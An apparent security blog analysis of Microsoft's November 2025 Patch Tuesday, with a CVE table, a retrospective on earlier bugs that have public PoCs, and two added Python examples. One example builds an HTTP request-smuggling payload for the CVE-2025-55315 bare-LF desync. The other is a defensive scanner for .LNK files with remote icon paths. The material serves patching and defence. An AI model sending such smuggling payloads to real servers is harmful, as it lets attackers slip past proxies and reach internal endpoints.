Analysis of Microsoft Patch Tuesday updates - November 2025
Executive Summary
On Tuesday, November 11, 2025, Microsoft released its monthly security update addressing 63 vulnerabilities in its products.
By severity:
- Critical - 4;
- Important - 59.
Exploited (Zero-Days) and Publicly Disclosed Vulnerabilities
Special attention should be paid to the following vulnerability; fixing it is the highest priority:
- CVE-2025-62215 (CVSS 7.0; Important) - Windows Kernel Elevation of Privilege Vulnerability (Elevation of Privilege). Exploited in the wild. A race condition (CWE-362) in the Windows kernel: a local attacker who already runs code as a low-privileged user and wins the race can corrupt kernel memory and execute code as SYSTEM. The CVSS 7.0 reflects the local attack vector and the high attack complexity of winning the race reliably, not a lack of impact. Like most kernel EoP bugs it is a post-compromise primitive, so in practice it is chained after a separate initial-access vector (a malicious document, a browser bug, or stolen credentials); there is no configuration-level mitigation, and the fix is the cumulative update.
General overview and trends
November 2025 Patch Tuesday can be described as a relative lull after the massive October update. Microsoft addressed 63 vulnerabilities, a significant drop compared to 175 last month. Despite the smaller volume, this release includes several serious threats that require prompt action. Key trends observed this month:
- Actively exploited kernel privilege escalation: The main event this month is the fix for CVE-2025-62215, a Windows kernel EoP that Microsoft reports as already exploited in the wild. Although it is rated only "Important" (CVSS 7.0, local attack vector), active exploitation makes it the top remediation priority: an attacker who already has code running as a standard user on an unpatched host gets SYSTEM, turning any phishing-level foothold into full control of the machine.
- Continued dominance of Elevation of Privilege (EoP) vulnerabilities: As in previous months, Elevation of Privilege vulnerabilities make up a significant portion of the fixes. This month they affect key components such as the Windows kernel, the Common Log File System (CLFS), drivers, and various system services, underscoring the ongoing need to harden the OS’s internal security mechanisms.
- Vulnerabilities in developer tools and AI: This month again highlights the security of modern tooling. The remote code execution vulnerability CVE-2025-62222 in Agentic AI and Visual Studio Code, together with the security feature bypass issues in the Copilot Chat extension (CVE-2025-62449) and in GitHub Copilot and Visual Studio Code (CVE-2025-62453), point to a shift in attack focus toward development environments, which hold source code, credentials and signing material and are becoming an increasingly attractive target.
- The return of old familiar issues: The Routing and Remote Access Service (RRAS) is back on the list with multiple vulnerabilities, including RCE. This, along with numerous fixes for Microsoft Office and Excel, confirms that these components remain persistent sources of risk and require regular attention from administrators.
Full List of Vulnerabilities
Below is a table of all vulnerabilities fixed this month.
| CVE | Title | Type | CVSS | Severity | Exploited | Publicly Disclosed |
|---|---|---|---|---|---|---|
| CVE-2025-62215 | Windows Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | Yes | No |
| CVE-2025-60724 | GDI+ Remote Code Execution Vulnerability | Remote Code Execution | 9.8 | Important | No | No |
| CVE-2025-59499 | Microsoft SQL Server Elevation of Privilege Vulnerability | Elevation of Privilege | 8.8 | Important | No | No |
| CVE-2025-62220 | Windows Subsystem for Linux GUI Remote Code Execution Vulnerability | Remote Code Execution | 8.8 | Important | No | No |
| CVE-2025-62222 | Agentic AI and Visual Studio Code Remote Code Execution Vulnerability | Remote Code Execution | 8.8 | Important | No | No |
| CVE-2025-62210 | Dynamics 365 Field Service (online) Spoofing Vulnerability | Spoofing | 8.7 | Important | No | No |
| CVE-2025-62211 | Dynamics 365 Field Service (online) Spoofing Vulnerability | Spoofing | 8.7 | Important | No | No |
| CVE-2025-30398 | Nuance PowerScribe 360 Information Disclosure Vulnerability | Information Disclosure | 8.1 | Critical | No | No |
| CVE-2025-60715 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-62204 | Microsoft SharePoint Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-62452 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-59505 | Windows Smart Card Reader Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59511 | Windows WLAN Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59512 | Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59514 | Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60703 | Windows Remote Desktop Services Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60705 | Windows Client-Side Caching Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60707 | Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60709 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60710 | Host Process for Windows Tasks Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60713 | Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60714 | Windows OLE Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-60718 | Windows Administrator Protection Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60720 | Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60721 | Windows Administrator Protection Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60727 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62199 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Critical | No | No |
| CVE-2025-62200 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62201 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62203 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62205 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62216 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-60704 | Windows Kerberos Elevation of Privilege Vulnerability | Elevation of Privilege | 7.5 | Important | No | No |
| CVE-2025-59504 | Azure Monitor Agent Remote Code Execution Vulnerability | Remote Code Execution | 7.3 | Important | No | No |
| CVE-2025-60726 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 7.1 | Important | No | No |
| CVE-2025-62202 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 7.1 | Important | No | No |
| CVE-2025-59506 | DirectX Graphics Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59507 | Windows Speech Runtime Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59508 | Windows Speech Recognition Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59515 | Windows Broadcast DVR User Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-60716 | DirectX Graphics Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Critical | No | No |
| CVE-2025-60717 | Windows Broadcast DVR User Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-60719 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62213 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62217 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62218 | Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62219 | Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62449 | Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability | Security Feature Bypass | 6.8 | Important | No | No |
| CVE-2025-47179 | Configuration Manager Elevation of Privilege Vulnerability | Elevation of Privilege | 6.7 | Important | No | No |
| CVE-2025-62214 | Visual Studio Remote Code Execution Vulnerability | Remote Code Execution | 6.7 | Critical | No | No |
| CVE-2025-60708 | Storvsp.sys Driver Denial of Service Vulnerability | Denial of Service | 6.5 | Important | No | No |
| CVE-2025-60722 | Microsoft OneDrive for Android Elevation of Privilege Vulnerability | Elevation of Privilege | 6.5 | Important | No | No |
| CVE-2025-62206 | Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability | Information Disclosure | 6.5 | Important | No | No |
| CVE-2025-60723 | DirectX Graphics Kernel Denial of Service Vulnerability | Denial of Service | 6.3 | Important | No | No |
| CVE-2025-59240 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-59509 | Windows Speech Recognition Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-59510 | Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability | Denial of Service | 5.5 | Important | No | No |
| CVE-2025-59513 | Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-60706 | Windows Hyper-V Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62208 | Windows License Manager Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62209 | Windows License Manager Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62453 | GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability | Security Feature Bypass | 5.0 | Important | No | No |
| CVE-2025-60728 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 4.3 | Important | No | No |
Retrospective analysis of vulnerabilities
- CVE-2025-53766 - GDI+ Remote Code Execution Vulnerability (Remote Code Execution). The vulnerability is a heap-based buffer overflow in the GDI+ library (gdiplus.dll) that occurs when processing a specially crafted metafile embedded in an image or document. The issue stems from an incorrect memory offset calculation in the EpScanBitmap::NextBuffer function, which leads to writing data beyond the allocated buffer. A detailed technical analysis and a comparison of the vulnerable and patched versions of the library are available on GitHub. The vulnerability was fixed in August 2025.
- CVE-2025-50168 - Win32k Elevation of Privilege Vulnerability (Elevation of Privilege). A "Type Confusion" vulnerability (use of an incompatible type) in the DirectComposition kernel component that causes a heap-based buffer overflow and allows a local user to elevate privileges to SYSTEM. A public exploit for this vulnerability was presented at Pwn2Own Berlin 2025. The vulnerability was fixed in August 2025.
- CVE-2025-54110 - Windows Kernel Elevation of Privilege Vulnerability (Elevation of Privilege). A Windows kernel vulnerability caused by an integer overflow during memory allocation. A low-privileged local user can send specially crafted data that results in an undersized buffer allocation and allows arbitrary code execution with SYSTEM privileges. A GitHub lab with a public PoC demonstrates exploitation. The vulnerability was fixed in September 2025.
- CVE-2025-54897 - Microsoft SharePoint Remote Code Execution Vulnerability (Remote Code Execution). A vulnerability caused by unsafe deserialization of untrusted data (CWE-502) that allows an authenticated attacker, even with low privileges, to execute arbitrary code on the server. A detailed lab/PoC containing a ready-to-use exploit for carrying out the attack is publicly available. The vulnerability was fixed in September 2025.
- CVE-2025-54918 - Windows NTLM Elevation of Privilege Vulnerability (Elevation of Privilege). A vulnerability in the NTLM protocol that enables an authentication reflection (NTLM reflection) attack for privilege escalation. A PoC for this vulnerability has been published on GitHub. Exploitation combines two techniques: first, the "Printer Bug" coercion (implemented in the printerbugnew.py script over RPC-over-TCP) forces the target system, for example a Windows Server 2025 domain controller, to authenticate to the attacker's machine. That authentication is then reflected back to a critical service on the target itself, such as LDAPS. The issue is that this method can bypass protections such as LDAP Channel Binding, resulting in SYSTEM-level privileges. The vulnerability was fixed in September 2025.
- CVE-2025-55315 - ASP.NET Security Feature Bypass Vulnerability (Security Feature Bypass). A critical HTTP Request Smuggling vulnerability in the ASP.NET Core Kestrel web server with a CVSS score of 9.9. It allows an attacker to "hide" a second request inside the first, bypassing front-end defenses (e.g., reverse proxies and WAFs), stealing user sessions, or performing SSRF attacks. The technical mechanism, the server accepting a chunk header terminated by a single newline character (\n) instead of the standard (\r\n) so that the front end and Kestrel disagree about where the body ends, is described in detail in an article. A public exploit is available on GitHub (CVE-2025-55315-PoC-Exploit). The vulnerability was fixed in October 2025.
- CVE-2025-59287 - Windows Server Update Service (WSUS) Remote Code Execution Vulnerability (Remote Code Execution). The vulnerability is related to unsafe data deserialization. A remote unauthenticated attacker can send a specially crafted request to the WSUS web service containing a malicious object encrypted with a known static key. The server decrypts and deserializes the object, leading to arbitrary code execution with SYSTEM privileges. Technical analysis and PoC for this vulnerability were published by the researcher hawktrace. The vulnerability was fixed in October 2025.
- CVE-2025-59214 - Microsoft Windows File Explorer Spoofing Vulnerability (Spoofing). A Windows File Explorer vulnerability that bypasses the fix for CVE-2025-50154 and allows disclosure of a user's NTLMv2 (NTLMSSP) authentication response without the user ever opening the file (zero-click). The attack uses a specially crafted shortcut file (.LNK) whose icon points to an executable on a remote SMB server. When File Explorer renders the folder and tries to display the shortcut's icon, it automatically connects to the remote resource, and the NTLM authentication is sent to the attacker's server, where it can be cracked offline or relayed. A PoC and a detailed description are published on GitHub. The vulnerability was fixed in October 2025.
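The bare-LF discrepancy behind CVE-2025-55315, worked through as an added example. This is hypothetical code written for this page, not Kestrel's parser and not the public PoC: a decoder that accepts a lone \n as the end of the chunk-size line (the backend) and one that only accepts \r\n (the front end) decode the same bytes into different bodies. The smuggled request line, the host name and the filler are constructed, and the payload layout illustrates the desync class rather than reproducing the published exploit.

```python
"""
Lenient vs strict handling of the chunk-size line in HTTP/1.1 chunked bodies.

Added example for this page: hypothetical code, not Kestrel's parser and not
the public PoC. A backend that ends the chunk-size line at a bare "\n" (the
behaviour described for CVE-2025-55315) and a front end that ends it only at
"\r\n" can decode one byte sequence into two different bodies; whatever the
backend leaves over is parsed as the next request on the same connection.
"""

# Constructed sample request the attacker wants the backend to see and the
# front end never to inspect (hostname and path are made up).
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: internal.example\r\n\r\n"


def _read_line(buf: bytes, pos: int, lenient: bool) -> tuple[bytes, int]:
    """Return (line, next_pos). Lenient: stop at the first LF and drop a CR
    before it. Otherwise stop only at CRLF, as RFC 9112 requires."""
    if lenient:
        end = buf.index(b"\n", pos)
        line = buf[pos:end]
        return (line[:-1] if line.endswith(b"\r") else line), end + 1
    end = buf.index(b"\r\n", pos)
    return buf[pos:end], end + 2


def decode_chunked(buf: bytes, mode: str) -> tuple[bytes, bytes]:
    """Decode one chunked body; return (body, leftover bytes after the body).

    mode "lenient":  bare LF ends a line (the vulnerable behaviour).
    mode "tolerant": CRLF ends a line; chunk extensions are skipped unchecked.
    mode "strict":   CRLF ends a line; a stray CR or LF in the line is rejected.
    """
    if mode not in ("lenient", "tolerant", "strict"):
        raise ValueError(f"unknown mode {mode!r}")
    lenient = mode == "lenient"
    pos, body = 0, bytearray()
    while True:
        line, pos = _read_line(buf, pos, lenient)
        if mode == "strict" and (b"\n" in line or b"\r" in line):
            raise ValueError("bare CR or LF inside chunk-size line")
        # chunk-size [ ";" chunk-ext ]: the extension is ignored here
        size = int(line.split(b";", 1)[0].strip().decode("ascii"), 16)
        if size == 0:
            while True:                       # trailer section ends at an empty line
                line, pos = _read_line(buf, pos, lenient)
                if line == b"":
                    break
            return bytes(body), buf[pos:]
        chunk = buf[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        pos += size
        term, pos = _read_line(buf, pos, lenient)
        if term != b"":
            raise ValueError("chunk data not followed by CRLF")
        body += chunk


def build_payload(smuggled: bytes) -> bytes:
    """Wrap `smuggled` so a CRLF-only front end sees one complete body while a
    bare-LF backend sees the body end early with `smuggled` left on the wire.
    Illustrative layout for the desync class, not the published exploit."""
    hidden = b"0\r\n\r\n" + smuggled       # backend: end-of-body marker, then the extra request
    n = len(hidden)
    filler = b"A" * n                       # no CR/LF, so the front end swallows it as chunk-ext
    return f"{n:x};\n".encode() + filler + b"\r\n" + hidden + b"\r\n0\r\n\r\n"


def rejects(buf: bytes, mode: str) -> bool:
    """True if the decoder in `mode` refuses the body outright."""
    try:
        decode_chunked(buf, mode)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = build_payload(SMUGGLED)
    for mode in ("tolerant", "lenient"):
        body, rest = decode_chunked(payload, mode)
        print(f"{mode:9} body={body!r}\n{'':9} leftover={rest!r}")
    print("strict rejects:", rejects(payload, "strict"))
```

Run as a script it prints the two views of the same bytes. The "tolerant" front end consumes everything as one body and forwards it; the "lenient" backend finishes the body early and keeps the smuggled GET as leftover bytes, which a keep-alive server then parses as a fresh request the proxy never saw. Two caveats: the desync only works against a front end that does not validate chunk-extension bytes, so a proxy that rejects stray control characters closes the gap from its side; and the "strict" mode shows the cheap server-side fix, refusing any CR or LF that is not part of the CRLF terminator.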
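A triage scanner for the shortcut trick described under CVE-2025-59214, as an added example. This is hypothetical code written for this page, not the PoC from the write-up: it parses enough of the MS-SHLLINK layout to reach the two places a shortcut names its icon source, the ICON_LOCATION string and the IconEnvironmentDataBlock, and flags any path that resolves to a UNC share. The build_lnk helper and the host names in it are constructed fixtures so that the script runs offline; they are there for the scanner's benefit and are not the technique from the write-up.

```python
r"""
Scan Windows shortcut (.LNK) files for icon paths that point at a remote share.

Hypothetical scanner written for this page (not Microsoft's code and not the
CVE-2025-59214 PoC). Explorer fetches a shortcut's icon as soon as the folder
is rendered, so an icon path of the form \\host\share\... forces an outbound
SMB connection and NTLM authentication without the user opening anything.
"""
from __future__ import annotations

import struct

HEADER_SIZE = 0x4C
CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags (MS-SHLLINK 2.1.1); StringData fields appear in this fixed order.
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
STRING_ORDER = (HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON)
SIG_ICON_ENV = 0xA0000007     # IconEnvironmentDataBlock signature
ICON_ENV_BLOCK_SIZE = 0x314   # 8-byte block header + 260 ANSI + 520 UTF-16 bytes


def _string_data(buf: bytes, pos: int, unicode: bool) -> tuple[str, int]:
    """Read one StringData field: a 2-byte char count followed by the chars."""
    (count,) = struct.unpack_from("<H", buf, pos)
    width = 2 if unicode else 1
    raw = buf[pos + 2:pos + 2 + count * width]
    return raw.decode("utf-16-le" if unicode else "cp1252"), pos + 2 + count * width


def icon_sources(lnk: bytes) -> list[str]:
    """Return every icon path the shortcut names, from StringData and ExtraData."""
    if len(lnk) < HEADER_SIZE or struct.unpack_from("<I", lnk, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    (flags,) = struct.unpack_from("<I", lnk, 0x14)
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                       # LinkTargetIDList: 2-byte size + items
        pos += 2 + struct.unpack_from("<H", lnk, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfo: first DWORD is its total size
        pos += struct.unpack_from("<I", lnk, pos)[0]
    found = []
    for flag in STRING_ORDER:                     # only flagged StringData fields are present
        if flags & flag:
            text, pos = _string_data(lnk, pos, bool(flags & IS_UNICODE))
            if flag == HAS_ICON:
                found.append(text)
    while pos + 4 <= len(lnk):                    # ExtraData blocks until the terminal block
        (size,) = struct.unpack_from("<I", lnk, pos)
        if size < 4 or pos + size > len(lnk):
            break
        (sig,) = struct.unpack_from("<I", lnk, pos + 4)
        if sig == SIG_ICON_ENV and size >= ICON_ENV_BLOCK_SIZE:
            ansi = lnk[pos + 8:pos + 268].decode("cp1252", "replace").split("\x00")[0]
            wide = lnk[pos + 268:pos + 788].decode("utf-16-le", "replace").split("\x00")[0]
            found.append(wide or ansi)
        pos += size
    return found


def is_unc(path: str) -> bool:
    r"""True for \\host\share style paths, including the \\?\UNC\ form."""
    p = path.strip()
    return p.startswith("\\\\") or p.startswith("//")


def unc_host(path: str) -> str:
    """Host component of a UNC path (the SMB server Explorer would contact)."""
    p = path.strip().lstrip("\\/")
    if p.lower().startswith("?\\unc\\"):
        p = p[6:]
    return p.split("\\")[0].split("/")[0]


def remote_icons(lnk: bytes) -> list[tuple[str, str]]:
    """(icon_path, host) for every icon source that would be fetched over the network."""
    return [(p, unc_host(p)) for p in icon_sources(lnk) if is_unc(p)]


def build_lnk(icon: str, env_icon: str | None = None) -> bytes:
    """Assemble a minimal shell link (no target, no LinkInfo) as a test fixture.
    Constructed for the scanner's benefit; not the file from the write-up."""
    flags = IS_UNICODE | HAS_ICON
    header = struct.pack("<I16sI", HEADER_SIZE, CLSID, flags).ljust(HEADER_SIZE, b"\x00")
    out = header + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")
    if env_icon is not None:
        out += struct.pack("<II", ICON_ENV_BLOCK_SIZE, SIG_ICON_ENV)
        out += env_icon.encode("cp1252").ljust(260, b"\x00")
        out += env_icon.encode("utf-16-le").ljust(520, b"\x00")
    return out + struct.pack("<I", 0)            # TerminalBlock


if __name__ == "__main__":
    import sys
    for name in sys.argv[1:]:
        with open(name, "rb") as f:
            for path, host in remote_icons(f.read()):
                print(f"{name}: icon fetched from {host} ({path})")
```

Point it at a directory of shortcuts pulled from mail attachments or a public share and it lists the hosts Explorer would authenticate to. Treat it as a triage filter, not proof of safety: icon paths can also be reached through environment-variable expansion and through the link target itself, which this scanner does not resolve, and the CVE-2025-59214 write-up exists precisely because a variant slipped past the earlier fix. On the network side, the complementary control is blocking outbound SMB (TCP 445) from workstations to the Internet, which stops the authentication from leaving regardless of how the shortcut is built.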
Conclusion
November 2025’s security update, while smaller than the previous one, is critical due to the presence of an actively exploited vulnerability. Administrators should avoid a false sense of security from the lower number of fixes and act promptly. Priority should be given to immediately installing updates for the following vulnerabilities:
- Actively exploited CVE-2025-62215 (Windows Kernel, EoP), to deny attackers a reliable local path from a standard-user foothold to SYSTEM.
- All 4 critical vulnerabilities affecting Microsoft Office (CVE-2025-62199), Nuance PowerScribe (CVE-2025-30398), DirectX (CVE-2025-60716) and Visual Studio (CVE-2025-62214), as they can lead to arbitrary code execution or disclosure of sensitive information.
It is also recommended to pay attention to servers with RRAS and SharePoint roles, as well as developer workstations using Visual Studio Code and AI assistants.
Finally, pay close attention to the section "Retrospective analysis of vulnerabilities". The publication of PoC exploits for vulnerabilities fixed in previous months multiplies the risk of exploitation, because the cost of weaponizing them has dropped to near zero. If you still have not installed the August, September and October updates, now is the time to do so and close attack vectors that are publicly known.